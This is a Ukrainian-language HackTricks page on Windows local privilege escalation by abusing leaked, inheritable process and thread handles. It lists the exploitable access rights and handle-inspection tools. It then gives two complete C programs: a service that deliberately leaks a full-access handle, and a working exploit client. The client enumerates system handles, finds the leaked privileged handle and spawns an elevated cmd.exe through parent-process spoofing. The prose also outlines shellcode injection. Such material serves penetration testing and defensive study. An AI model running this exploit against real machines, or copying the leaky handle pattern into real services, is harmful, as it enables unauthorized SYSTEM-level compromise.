Поділіться своїми хакерськими трюками, надсилайте PR доHackTricks та HackTricks Cloud репозиторіїв GitHub.
Вступ
Дескриптори в процесі дозволяють отримати доступ до різних ресурсів Windows:
Вже було кілька випадків підвищення привілеїв, коли привілейований процес з відкритими та успадковуваними дескрипторами запускав непривілейований процес, надаючи йому доступ до всіх цих дескрипторів.
Наприклад, уявіть, що процес, який працює як SYSTEM, відкриває новий процес (OpenProcess()) з повним доступом. Той самий процес також створює новий процес (CreateProcess()), з низькими привілеями, але успадковуючи всі відкриті дескриптори головного процесу.
Тоді, якщо у вас є повний доступ до низькопривілейованого процесу, ви можете отримати відкритий дескриптор до привілейованого процесу, створеного за допомогою OpenProcess() і впровадити shellcode.
Цікаві Дескриптори
Процес
Як ви читали у початковому прикладі, якщо непривілейований процес успадковує дескриптор процесу привілейованого процесу з достатніми дозволами, він зможе виконати довільний код на ньому.
У цій чудовій статті ви можете побачити, як експлуатувати будь-який дескриптор процесу, який має будь-які з наступних дозволів:
PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
PROCESS_CREATE_THREAD
PROCESS_DUP_HANDLE
PROCESS_VM_WRITE
Потік
Аналогічно до дескрипторів процесу, якщо непривілейований процес успадковує дескриптор потоку привілейованого процесу з достатніми дозволами, він зможе виконати довільний код на ньому.
У цій чудовій статті ви також можете побачити, як експлуатувати будь-який дескриптор процесу, який має будь-які з наступних дозволів:
THREAD_ALL_ACCESS
THREAD_DIRECT_IMPERSONATION
THREAD_SET_CONTEXT
Дескриптори Файлів, Ключів та Розділів
Якщо непривілейований процес успадковує дескриптор з дозволами на запис до привілейованого файлу або реєстру, він зможе перезаписати файл/реєстр (і з великим щастям, підвищити привілеї).
Дескриптори Розділів схожі на дескриптори файлів, загальна назва цих об'єктів - "File Mapping". Вони використовуються для роботи з великими файлами без зберігання всього файлу в пам'яті. Це робить експлуатацію трохи "схожою" на експлуатацію дескриптора файлу.
Як переглянути дескриптори процесів
Process Hacker
Process Hacker - це безкоштовний інструмент, який можна завантажити. Він має кілька дивовижних опцій для інспекції процесів, одна з яких - можливість перегляду дескрипторів кожного процесу.
Зверніть увагу, що для перегляду всіх дескрипторів всіх процесів потрібен SeDebugPrivilege (тому вам потрібно запустити Process Hacker як адміністратор).
Щоб переглянути дескриптори процесу, клацніть правою кнопкою миші на процесі та виберіть Дескриптори:
Потім клацніть правою кнопкою миші на дескрипторі та перевірте дозволи:
Дескриптори Sysinternals
Дескрипторивід Sysinternals також перераховуватимуть дескриптори на процес у консолі:
LeakedHandlesFinder
Цей інструмент дозволяє вам відстежувати витікші дескриптори та навіть автоматично експлуатувати їх для підвищення привілеїв.
Методологія
Тепер, коли ви знаєте, як знаходити дескриптори процесів, вам потрібно перевірити, чи непривілейований процес має доступ до привілейованих дескрипторів. У цьому випадку користувач процесу може мати можливість отримати дескриптор і використовувати його для підвищення привілеїв.
Було зазначено, що для доступу до всіх дескрипторів потрібен SeDebugPrivilege. Але користувач все одно може отримати доступ до дескрипторів своїх процесів, тому може бути корисним, якщо ви хочете підвищити привілеї лише для цього користувача, виконати інструменти з звичайними дозволами користувача.
Наприклад, наступний код належить службі Windows, яка була б вразливою. Вразливий код цього бінарного файлу служби розташований всередині функції Exploit. Ця функція починає створювати новий обробник процесу з повним доступом. Потім вона створює процес з низькими привілеями (копіюючи токен з низькими привілеями explorer.exe), який виконує C:\users\username\desktop\client.exe. Вразливість полягає в тому, що вона створює процес з низькими привілеями з bInheritHandles як TRUE.
Отже, цей процес з низькими привілеями може отримати обробник високопривілейованого процесу, створеного спочатку, і впровадити та виконати шелл-код (див. наступний розділ).
#include<windows.h>#include<tlhelp32.h>#include<tchar.h>#pragmacomment (lib, "advapi32")TCHAR* serviceName =TEXT("HandleLeakSrv");SERVICE_STATUS serviceStatus;SERVICE_STATUS_HANDLE serviceStatusHandle =0;HANDLE stopServiceEvent =0;//Find PID of a proces from its nameintFindTarget(constchar*procname) {HANDLE hProcSnap;PROCESSENTRY32 pe32;int pid =0;hProcSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);if (INVALID_HANDLE_VALUE == hProcSnap) return0;pe32.dwSize =sizeof(PROCESSENTRY32);if (!Process32First(hProcSnap,&pe32)) {CloseHandle(hProcSnap);return0;}while (Process32Next(hProcSnap,&pe32)) {if (lstrcmpiA(procname,pe32.szExeFile)==0) {pid =pe32.th32ProcessID;break;}}CloseHandle(hProcSnap);return pid;}intExploit(void) {STARTUPINFOA si;PROCESS_INFORMATION pi;int pid =0;HANDLE hUserToken;HANDLE hUserProc;HANDLE hProc;// open a handle to itself (privileged process) - this gets leaked!hProc =OpenProcess(PROCESS_ALL_ACCESS,TRUE, GetCurrentProcessId());// get PID of user low privileged processif ( pid =FindTarget("explorer.exe") )hUserProc =OpenProcess(PROCESS_QUERY_INFORMATION,FALSE, pid);elsereturn-1;// extract low privilege token from a user's processif (!OpenProcessToken(hUserProc, TOKEN_ALL_ACCESS,&hUserToken)) {CloseHandle(hUserProc);return-1;}// spawn a child process with low privs and leaked handleZeroMemory(&si,sizeof(si));si.cb =sizeof(si);ZeroMemory(&pi,sizeof(pi));CreateProcessAsUserA(hUserToken,"C:\\users\\username\\Desktop\\client.exe",NULL,NULL,NULL,TRUE,0,NULL,NULL,&si,&pi);CloseHandle(hProc);CloseHandle(hUserProc);return0;}void WINAPI ServiceControlHandler( DWORD controlCode ) {switch ( controlCode ) {case SERVICE_CONTROL_SHUTDOWN:case SERVICE_CONTROL_STOP:serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;SetServiceStatus( serviceStatusHandle,&serviceStatus );SetEvent( stopServiceEvent );return;case SERVICE_CONTROL_PAUSE:break;case SERVICE_CONTROL_CONTINUE:break;case SERVICE_CONTROL_INTERROGATE:break;default:break;}SetServiceStatus( serviceStatusHandle,&serviceStatus );}void WINAPI ServiceMain( DWORD argc, TCHAR* argv[] ) {// initialise service statusserviceStatus.dwServiceType = SERVICE_WIN32;serviceStatus.dwCurrentState = SERVICE_STOPPED;serviceStatus.dwControlsAccepted =0;serviceStatus.dwWin32ExitCode = NO_ERROR;serviceStatus.dwServiceSpecificExitCode = NO_ERROR;serviceStatus.dwCheckPoint =0;serviceStatus.dwWaitHint =0;serviceStatusHandle =RegisterServiceCtrlHandler( serviceName, ServiceControlHandler );if ( serviceStatusHandle ) {// service is startingserviceStatus.dwCurrentState = SERVICE_START_PENDING;SetServiceStatus( serviceStatusHandle,&serviceStatus );// do initialisation herestopServiceEvent =CreateEvent( 0,FALSE,FALSE,0 );// runningserviceStatus.dwControlsAccepted |= (SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);serviceStatus.dwCurrentState = SERVICE_RUNNING;SetServiceStatus( serviceStatusHandle,&serviceStatus );Exploit();WaitForSingleObject( stopServiceEvent,-1 );// service was stoppedserviceStatus.dwCurrentState = SERVICE_STOP_PENDING;SetServiceStatus( serviceStatusHandle,&serviceStatus );// do cleanup hereCloseHandle( stopServiceEvent );stopServiceEvent =0;// service is now stoppedserviceStatus.dwControlsAccepted &=~(SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);serviceStatus.dwCurrentState = SERVICE_STOPPED;SetServiceStatus( serviceStatusHandle,&serviceStatus );}}voidInstallService() {SC_HANDLE serviceControlManager =OpenSCManager( 0,0, SC_MANAGER_CREATE_SERVICE );if ( serviceControlManager ) {TCHAR path[ _MAX_PATH +1 ];if ( GetModuleFileName( 0, path,sizeof(path)/sizeof(path[0]) )>0 ) {SC_HANDLE service =CreateService( serviceControlManager,serviceName, serviceName,SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, path,0,0,0,0,0 );if ( service )CloseServiceHandle( service );}CloseServiceHandle( serviceControlManager );}}voidUninstallService() {SC_HANDLE serviceControlManager =OpenSCManager( 0,0, SC_MANAGER_CONNECT );if ( serviceControlManager ) {SC_HANDLE service =OpenService( serviceControlManager,serviceName, SERVICE_QUERY_STATUS | DELETE );if ( service ) {SERVICE_STATUS serviceStatus;if ( QueryServiceStatus( service,&serviceStatus ) ) {if ( serviceStatus.dwCurrentState == SERVICE_STOPPED )DeleteService( service );}CloseServiceHandle( service );}CloseServiceHandle( serviceControlManager );}}int_tmain( int argc, TCHAR* argv[] ){if ( argc >1&&lstrcmpi( argv[1], TEXT("install") )==0 ) {InstallService();}elseif ( argc >1&&lstrcmpi( argv[1], TEXT("uninstall") )==0 ) {UninstallService();}else {SERVICE_TABLE_ENTRY serviceTable[]= {{ serviceName, ServiceMain },{ 0,0 }};StartServiceCtrlDispatcher( serviceTable );}return0;}
Приклад Використання Уразливості 1
У реальному сценарії вам, ймовірно, не вдасться контролювати виконуваний бінарний файл, який буде запущений уразливим кодом (C:\users\username\desktop\client.exe у цьому випадку). Ймовірно, ви зламаєте процес і вам потрібно буде перевірити, чи можете ви отримати доступ до будь-якого уразливого дескриптора будь-якого привілейованого процесу.
У цьому прикладі ви можете знайти код можливої експлойтації для C:\users\username\desktop\client.exe.
Найцікавіша частина цього коду розташована в GetVulnProcHandle. Ця функція почне отримувати всі дескриптори, потім вона перевірить, чи який-небудь з них належить тому ж PID, і чи дескриптор належить процесу. Якщо всі ці вимоги виконані (знайдено доступний відкритий дескриптор процесу), вона спробує впровадити та виконати шелл-код, зловживаючи дескриптором процесу.
Впровадження шелл-коду виконується всередині функції Inject і просто запише шелл-код всередину привілейованого процесу та створить потік всередині того ж процесу для виконання шелл-коду).
У реальному сценарії вам, ймовірно, не вдасться контролювати виконуваний бінарний файл, який буде запущений уразливим кодом (C:\users\username\desktop\client.exe у цьому випадку). Ймовірно, ви зламаєте процес і вам потрібно буде перевірити, чи можете ви отримати доступ до будь-якого уразливого дескриптора будь-якого привілейованого процесу.
У цьому прикладі, замість зловживання відкритим дескриптором для впровадження та виконання шелл-коду, буде використано токен привілейованого відкритого процесу для створення нового. Це виконується в рядках від 138 до 148.
Зверніть увагу, як використовується функція UpdateProcThreadAttribute з атрибутом PROC_THREAD_ATTRIBUTE_PARENT_PROCESS та дескриптором відкритого привілейованого процесу. Це означає, що створений процес потоку, що виконує _cmd.exe, матиме той самий токен привілеїв, що й процес з відкритим дескриптором.
#include<windows.h>#include<stdio.h>#include<stdlib.h>#include<string.h>#include<time.h>#include<wincrypt.h>#include<psapi.h>#include<tchar.h>#include<tlhelp32.h>#include"client.h"#pragmacomment (lib, "crypt32.lib")#pragmacomment (lib, "advapi32")#pragmacomment (lib, "kernel32")HANDLE GetVulnProcHandle(void) {ULONG handleInfoSize =0x10000;NTSTATUS status;PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) malloc(handleInfoSize);HANDLE hProc =NULL;POBJECT_TYPE_INFORMATION objectTypeInfo;PVOID objectNameInfo;UNICODE_STRING objectName;ULONG returnLength;HMODULE hNtdll =GetModuleHandleA("ntdll.dll");DWORD dwOwnPID =GetCurrentProcessId();pNtQuerySystemInformation =GetProcAddress(hNtdll,"NtQuerySystemInformation");pNtDuplicateObject =GetProcAddress(hNtdll,"NtDuplicateObject");pNtQueryObject =GetProcAddress(hNtdll,"NtQueryObject");pRtlEqualUnicodeString =GetProcAddress(hNtdll,"RtlEqualUnicodeString");pRtlInitUnicodeString =GetProcAddress(hNtdll,"RtlInitUnicodeString");printf("[+] Grabbing handles...");while ((status =pNtQuerySystemInformation( SystemHandleInformation, phHandleInfo, handleInfoSize,NULL )) == STATUS_INFO_LENGTH_MISMATCH)phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) realloc(phHandleInfo, handleInfoSize *=2);if (status != STATUS_SUCCESS){printf("[!] NtQuerySystemInformation failed!\n");return0;}printf("done.\n[+] Fetched %d handles.\n",phHandleInfo->NumberOfHandles);// iterate handles until we find the privileged process handlefor (int i =0; i <phHandleInfo->NumberOfHandles; ++i){SYSTEM_HANDLE_TABLE_ENTRY_INFO handle =phHandleInfo->Handles[i];// Check if this handle belongs to our own processif (handle.UniqueProcessId != dwOwnPID)continue;objectTypeInfo = (POBJECT_TYPE_INFORMATION) malloc(0x1000);if (pNtQueryObject( (HANDLE) handle.HandleValue,ObjectTypeInformation,objectTypeInfo,0x1000,NULL )!= STATUS_SUCCESS)continue;// skip some objects to avoid getting stuck// see: https://github.com/adamdriscoll/PoshInternals/issues/7if (handle.GrantedAccess ==0x0012019f&&handle.GrantedAccess !=0x00120189&&handle.GrantedAccess !=0x120089&&handle.GrantedAccess !=0x1A019F ) {free(objectTypeInfo);continue;}// get object name informationobjectNameInfo =malloc(0x1000);if (pNtQueryObject( (HANDLE) handle.HandleValue,ObjectNameInformation,objectNameInfo,0x1000,&returnLength )!= STATUS_SUCCESS) {// adjust the size of a returned object and query againobjectNameInfo =realloc(objectNameInfo, returnLength);if (pNtQueryObject( (HANDLE) handle.HandleValue,ObjectNameInformation,objectNameInfo,returnLength,NULL )!= STATUS_SUCCESS) {free(objectTypeInfo);free(objectNameInfo);continue;}}// check if we've got a process objectobjectName =*(PUNICODE_STRING) objectNameInfo;UNICODE_STRING pProcess;pRtlInitUnicodeString(&pProcess, L"Process");if (pRtlEqualUnicodeString(&objectTypeInfo->TypeName,&pProcess,TRUE)) {printf("[+] Found process handle (%x)\n",handle.HandleValue);hProc = (HANDLE) handle.HandleValue;free(objectTypeInfo);free(objectNameInfo);break;}elsecontinue;free(objectTypeInfo);free(objectNameInfo);}return hProc;}intmain(int argc,char**argv) {HANDLE hProc =NULL;STARTUPINFOEXA si;PROCESS_INFORMATION pi;int pid =0;SIZE_T size;BOOL ret;Sleep(20000);// find leaked process handlehProc =GetVulnProcHandle();if ( hProc !=NULL) {// Adjust proess attributes with PROC_THREAD_ATTRIBUTE_PARENT_PROCESSZeroMemory(&si,sizeof(STARTUPINFOEXA));InitializeProcThreadAttributeList(NULL,1,0,&size);si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST) HeapAlloc( GetProcessHeap(),0, size );InitializeProcThreadAttributeList(si.lpAttributeList,1,0,&size);UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hProc, sizeof(HANDLE), NULL, NULL);
si.StartupInfo.cb =sizeof(STARTUPINFOEXA);// Spawn elevated cmd processret =CreateProcessA( "C:\\Windows\\system32\\cmd.exe",NULL,NULL,NULL,TRUE,EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE,NULL,NULL, (LPSTARTUPINFOA)(&si),&pi );if (ret ==FALSE) {printf("[!] Error spawning new process: [%d]\n", GetLastError());return-1;}}Sleep(20000);return0;}
Цей інструмент дозволяє вам відстежувати витікання дескрипторів, щоб знайти вразливі та навіть автоматично експлуатувати їх. Також є інструмент для витікання одного дескриптора.